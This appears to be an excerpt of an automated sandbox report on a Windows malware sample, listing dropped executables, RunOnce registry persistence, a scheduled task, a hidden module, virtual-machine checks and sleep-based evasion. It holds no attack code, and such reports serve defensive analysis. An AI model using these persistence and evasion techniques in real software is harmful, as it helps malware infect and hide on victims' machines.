          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: bitsproxy.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: shdocvw.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: taskschd.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: xmllite.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: mstask.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\more.comSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: textshaping.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: textinputframework.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: coreuicomponents.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: coremessaging.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: ntmarta.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeSection loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: MilwaukeeRivers.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Persistence and Installation Behavior

          barindex
          Drops PE files with a suspicious file extension
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile created: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile created: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifJump to dropped file
          Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\rrwkeebJump to dropped file
          Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\rrwkeebJump to dropped file
          Source: C:\Windows\SysWOW64\more.comFile created: C:\Windows\Tasks\MB Led SDK.job
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ebhhaeg
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ebhhaeg
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ebhhaeg
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ebhhaeg

          Hooking and other Techniques for Hiding and Protection

          barindex
          Found hidden mapped module (file has been removed from disk)
          Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RRWKEEB
          Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RRWKEEB
          Source: C:\Windows\SysWOW64\more.comModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RRWKEEB
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSystem information queried: FirmwareTableInformation
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeAPI/Special instruction interceptor: Address: 6BEA7C44
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeAPI/Special instruction interceptor: Address: 6BEA7945
          Source: C:\Windows\SysWOW64\more.comAPI/Special instruction interceptor: Address: 6BEA3B54
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 101A317
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2267
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1869
          Source: C:\Windows\SysWOW64\more.comDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rrwkeebJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif TID: 6184Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif TID: 6212Thread sleep time: -120000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif TID: 6212Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6844Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif TID: 4988Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep count: 2267 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep count: 1869 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2268Thread sleep time: -540000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2268Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2268Thread sleep count: 35 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2268Thread sleep time: -1050000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2352Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 2268Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 180000
          Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\215655
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\215655\
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
